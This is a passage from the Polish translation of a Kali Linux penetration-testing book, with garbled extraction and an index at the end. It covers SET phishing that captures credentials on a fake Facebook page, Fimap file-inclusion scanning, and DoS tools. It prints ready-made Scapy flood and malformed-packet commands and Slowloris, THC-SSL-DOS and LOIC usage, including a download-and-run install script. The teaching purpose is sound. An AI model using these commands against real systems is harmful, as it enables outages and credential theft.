Kiedy u ytkownik rozpocznie wpisywanie nazwy konta i has a dost pu na naszej fa szywejstronie udaj cej witryn Facebook pakiet SET przechwyci ca y zwi zany z tym ruch sieciowyi nast pnie przekieruje u ytkownika do prawdziwej witryny internetowej Istnieje bardzo du-a szansa na to e po takim przekierowaniu u ytkownik b dzie przekonany e po prostu po-
myli si podczas wpisywania has a i zaloguje si jeszcze raz nie maj c wiadomo ci e bdquopodrodzerdquo pakiet SET przechwyci nazw jego konta i has o dost pu (zobacz drugi rysunek nanast pnej stronie)
Jak wida na powy szym rysunku pakiet SET przechwyci nazw naszego konta u ytkownikaDrChaos i nasze has o dost pu ILoveKali
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
253
Po zako czeniu tego wiczenia u yj kombinacji klawiszy Ctrl+C aby zako czy prac programuSET i wygenerowa raport w formacie HTML SET generuje profesjonalnie wygl daj cy ra-port ktoacuterego mo esz z powodzeniem u y podczas tworzenia raportu ko cowego z przepro-wadzonego testu penetracyjnego
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
254
Fimap
Fimap to narz dzie napisane w j zyku Python przeznaczone do wyszukiwania i wykorzysty-wania podatno ci i luk w zabezpieczeniach aplikacji internetowych pozwalaj cych na przeprowa-dzanie atakoacutew typu LFI (ang Local File Inclusion) lub RFI (ang Remote File Inclusion)
Aby uruchomi pakiet Fimap w systemie Kali Linux przejd do grupy Kali Linux a nast pniewybierz polecenie Web ApplicationsWeb Vulnerability Scannersfimap Po wybraniu tegopolecenia na ekranie pojawi si nowe okno terminala z wy wietlonym ekranem powitalnympolecenia fimap Dla pakietu fimap istnieje roacutewnie kilka dodatkowych wtyczek ktoacutere mo eszpobra z internetu i zainstalowa za pomoc nast puj cego polecenia
fimap --install -plugins
Dost pne wtyczki zostan wy wietlone w formie listy z opcj pozwalaj c na zainstalowaniewybranej wtyczki lub zako czenie dzia ania polecenia Jak wida w naszym przyk adzie do-st pne s dwie dodatkowe wtyczki st d polecenie instalowania musimy wykona dwukrotnieindywidualnie instaluj c poszczegoacutelne wtyczki (zobacz pierwszy rysunek na nast pnej stronie)
Aby u y pakietu Fimap musisz najpierw poda adres URL witryny ktoacutera b dzie celem skaneraIstnieje wiele metod definiowania adresoacutew URL Mo esz na przyk ad poda jeden wybrany adresURL ca list adresoacutew URL mo esz u y wyszukiwarki Google do zebrania adresoacutew URL
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
255
ale roacutewnie dobrze mo esz u y innych metod takich jak zbieranie wszystkich adresoacutew URLz hiper czy zamieszczonych na danej stronie internetowej czy pozyskiwanie adresoacutew URL z for-mularzy i nag oacutewkoacutew stron W naszym przypadku celem skanera b dzie witryna httpwwwthesecuritybloggercom
Aby uruchomi skanowanie witryny httpwwwthesecuritybloggercom powiniene wpisanast puj ce polecenie
fimap -u httpwwwthesecuritybloggercom
Pakiet Fimap rozpocznie skanowanie i sproacutebuje automatycznie wykry podatno ci na atakitypu LFIRFI Na rysunku przedstawionym poni ej wida jednak e witryna wwwthesecurity
bloggercom jest odporna na tego typu ataki
Ataki typu DoSW zdecydowanej wi kszo ci przypadkoacutew celem przeprowadzania testoacutew penetracyjnych jestidentyfikacja potencjalnych i rzeczywistych podatno ci i luk w zabezpieczeniach bez umy l-nego zak oacutecania dzia ania atakowanego systemu i bez robienia mu krzywdy w jakikolwiek in-ny sposoacuteb Jest to kluczowy element odroacute niaj cy autoryzowanego pentestera od z o liwegonapastnika maj cego niecne zamiary Prawdziwy napastnik nie przestrzega adnych regu
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
256
i nie zwraca uwagi na to czy jego dzia ania spowoduj zak oacutecenia w funkcjonowaniu atako-wanego systemu je eli tylko takie post powanie b dzie dla niego korzystne Czasami zdarzasi nawet e napastnik b dzie wr cz za wszelk cen szuka mo liwo ci zak oacutecenia dzia aniaczy nawet ca kowitego wy czenia atakowanego systemu Z tego powodu w niektoacuterych przypad-kach przeprowadzenie testoacutew odporno ci danej witryny czy aplikacji internetowej na ataki typuDoS (ang Denial of Service) mo e by bardzo po dane Testy tego rodzaju cz sto s nazywanetestami warunkoacutew skrajnych lub testami odporno ci na przeci enie systemu (ang stress testing)
Jedn z najwa niejszych spraw zwi zanych z testami odporno ci na ataki typu DoS jest bezwzgl dne uzyska-nie pisemnej zgody w a ciciela systemu na przeprowadzanie takich atakoacutew Niektoacutere metody atakoacutewmog mie negatywny wp yw na funkcjonowanie systemu nawet po zako czeniu testoacutew Dobrym roz-wi zaniem jest przeprowadzanie takich testoacutew na systemach z redundancj systemach nieprodukcyj-nych czy systemach zainstalowanych w rodowisku laboratoryjnym o ile to oczywi cie mo liwe
Najcz ciej spotykana metoda ataku DoS polega na bdquozalewaniurdquo badanego systemu masowonap ywaj cymi z zewn trz daniami Takie przeci enie zazwyczaj skutecznie uniemo liwiasystemowi odpowiadanie na rzeczywiste dania od autoryzowanych klientoacutew lub co najmniejtak spowalnia wysy anie odpowiedzi e ca y system staje si dla klientoacutew praktycznie bezu-yteczny Ataki typu DoS mog by skierowane na zasoby systemu (np przypisana przestrze
dyskowa przepustowo po cze sieciowych itd) konfiguracj systemu (np usuwanie tablicroutingu) informacje o stanie systemu (np resetowanie sesji TCP) oraz ka dy inny elementrodowiska systemu ktoacuterego przeci enie mo e spowodowa zak oacutecenie jego normalnego
funkcjonowania
Roacute nica pomi dzy atakami DoS (ang Denial of Service) a DDoS (ang Distributed Denial of Service) polega natym e do przeprowadzania ataku DoS napastnik wykorzystuje tylko jeden komputer podczas gdy w przy-padku atakoacutew DDoS liczba maszyn bior cych udzia w ataku mo e si ga tysi cy Omawianie zagadniezwi zanych z atakami DDoS wykracza niestety daleko poza ramy naszej ksi ki
Istniej cztery g oacutewne kategorie atakoacutew DoSDDoS Ataki wykorzystuj ce przeci enie po cze sieciowych (ang Volume Based
Attacks) mdash taki rodzaj ataku jest zwi zany z bdquozalewaniemrdquo atakowanego systemumasowo nap ywaj cymi pakietami UDP ICMP i innymi Celem takiego ataku jestprzeci enie po cze sieciowych atakowanego systemu nadmiernymi ilo ciamiprzesy anych pakietoacutew
Ataki na protoko y komunikacyjne (ang Protocol Attacks) mdash ataki te maj na celunadmierne wykorzystywanie zasoboacutew urz dze sieciowych takich jak routeryzapory sieciowe urz dzenia roacutewnowa ce obci enie po cze sieciowychPrzyk adami atakoacutew na protoko y komunikacyjne s ataki typu SYN floodPing of Death Smurf Teardrop wymuszanie fragmentacji pakietoacutew itp
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
257
Ataki na warstw aplikacji (ang Application Layer Attacks) mdash takie ataki wykorzystujnormalny ruch sieciowy do zak oacutecenia dzia ania lub nawet spowodowania awariidanej witryny lub aplikacji internetowej Przyk adami mog by ataki typu Zero-Dayczy ataki wykorzystuj ce inne podatno ci i luki w zabezpieczeniach witryn i aplikacjiinternetowych
Ataki powoduj ce wyczerpanie zasoboacutew sesji (ang Session Exhaustion) mdash takieataki powoduj wyczerpanie liczby dozwolonych jednocze nie sesji poprzez ci g enawi zywanie nowych po cze bez zamykania starych sesji co prowadzido wyczerpania zasoboacutew systemu
W systemie Kali Linux znajdziesz wiele narz dzi pozwalaj cych na wykorzystywanie podat-no ci i luk w zabezpieczeniach Narz dzia te na przyk ad Metasploit mog by u ywane doprzeprowadzania atakoacutew DoS na warstw aplikacji (wiele z tych narz dzi omawiali my ju wewcze niejszych rozdzia ach) W rozdziale 3 prezentowali my popularne narz dzie Scapypozwalaj ce na przeprowadzanie atakoacutew DoS na protoko y komunikacyjne Poni ej znaj-dziesz omoacutewienie kilku kolejnych narz dzi s u cych do przeprowadzania atakoacutew DoS ktoacuteremo esz znale w systemie Kali Linux
Aby przetestowa skuteczno ataku DoS mo esz u y witryny httpwwwupordownorg ktoacutera sprawdzadost pno podanej witryny internetowej
THX-SSL-DOSProtokoacute SSL (ang Secure Socket Layer) jest u ywany do nawi zywania bezpiecznych po -cze i transakcji w internecie Nawi zanie bezpiecznego po czenia z wykorzystaniem proto-ko u SSL wymaga u ycia po stronie serwera 15 razy wi kszej mocy obliczeniowej ni po stro-nie klienta Atak typu THC-SSL-DOS wykorzystuje t dysproporcj przez proacuteb prze adowaniaserwera spreparowanymi daniami nawi zania sesji SSL a do momentu kiedy przeci onyserwer si poddaje i przestaje odpowiada na dania przesy ane od innych autoryzowanychklientoacutew Atak wykorzystuje mechanizm renegocjacji bezpiecznego po czenia SSL do gene-rowania tysi cy takich da dla pojedynczego po czenia TCP Z tego powodu atak ten jestroacutewnie znany jako atak typu SSL-Exhaustion (ang mdash bdquowyczerpanie zasoboacutew SSLrdquo) Zalettakiego podej cia jest to e mo liwo ci przetwarzania da nawi zania sesji SSL s znaczniewy sze po stronie klienta co oznacza e przeci tny laptop pod czony do sieci za po red-nictwem cza o przeci tnej szybko ci mo e rzuci powa ne wyzwanie niemal ka demu serwero-wi aplikacji internetowych Podatno serweroacutew internetowych na ataki typu SSL-Exhaustionjest powszechnie znana a mimo to nie uda o si jeszcze opracowa skutecznej metody zapo-biegania takim atakom
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
258
Aby uruchomi pakiet THC-SSL-DOS w menu g oacutewnym systemu przejd do grupy Kali Linuxa nast pnie wybierz polecenie Stress TestingWeb Stress Testingthc-ssl-dos Po wybraniu pole-cenia pojawi si nowe okno terminala z ekranem powitalnym polecenia thc-ssl-dos Sk adniapolecenia jest nast puj ca
thc-ssl-dos [opcje] ltadres IP ofiarygt ltportgt and --accept
W wierszu wywo ania polecenia musisz umie ci opcj --accept w przeciwnym wypadku otrzymaszkomunikat o b dzie przedstawiony poni ej
Po uruchomieniu programu THC-SSL-DOS zobaczysz na ekranie kilka zabawnych komuni-katoacutew informuj cych e dzia anie programu si rozpocz o Na pierwszym rysunku zamiesz-czonym poni ej wida e zaatakowana witryna nie obs uguje protoko u SSL st d programwy wietla na ekranie komunikat o wyst pieniu b du Na kolejnym rysunku przedstawionosytuacj w ktoacuterej pomy lnie rozpocz si proces renegocjacji sesji SSL co w efekcie mo edoprowadzi do zak oacutecenia dzia ania atakowanego systemu Pami taj ataki tego typu mo eszprzeprowadza tylko na systemach dla ktoacuterych uzyska e pisemne zezwolenie w a cicielaPrzeprowadzenie takiego ataku mo e doprowadzi do powa nego ograniczenia funkcjonalno-ci atakowanego systemu lub nawet do jego ca kowitego za amania
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
259
ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych
Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece
W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia
send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)
Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
260
Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy
Nieprawid owa wersja protoko u IP
send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)
Nieprawid owa suma kontrolna pakietu TCP
send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)
send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)
send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)
Ustawiona tylko flaga FIN
send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)
Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2
send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka pakietu
send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)
ICMP Flood
send(IP(dst=10001)ICMP()iface=eth0count=2000)
Nieprawid owa suma kontrolna pakietu IP
send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)
Fragmentacja pakietoacutew IP
send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
261
roacuted owy adres IP taki sam jak docelowy adres IP
send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)
Brak pakietu warstwy L4
send(IP(dst=10001 src=10203040) iface=eth0 count=2000)
Jednocze nie ustawione flagi SYN i FIN
send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)
Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)
Slowloris
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
262
Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym
programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco
czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera
Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne
Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris
Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej
perl slowlorispl
W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)
perl slowlorispl -dns thesecuritybloggercom
Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)
Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)
Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
263
LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
264
narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki
Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa
Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej
apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs
Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej
mkdir loic
Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej
wget httpsrawgithubcomnicolargoloicinstaller masterloicsh
Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie
chmod 777 loicsh
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
265
Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej
loicsh install
Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie
loicsh update
Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie
loicsh run
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
266
U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny
Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP
Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding
Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane
DNSChef
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
267
Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne
Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera
SniffJoke
SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
268
SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force
Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)
Sk adnia wywo ania polecenia siege jest nast puj ca
siege [opcje] ltadres URL celugt
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
269
Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-
nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku
InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
270
wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS
TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych
Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci
PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce
W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia
W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew
Kup książkę Poleć książkę
Skorowidz
Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275
harmonogram 276zabezpiecze systemu 276
ALE 31analiza
bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych
zawieraj cychoprogramowanie firmware298
ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat
299zawarto ci plikoacutew PDF 299
da HTTP 203aplet Java 156aplikacje internetowe 23
b dy w zabezpieczeniach286
wykrywanie i mapowanie 241zakres testoacutew penetracyjnych
23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212
ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki
brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji
internetowych 147na parametry metod GET
i POST 131na protoko y komunikacyjne
256na serwery aplikacji
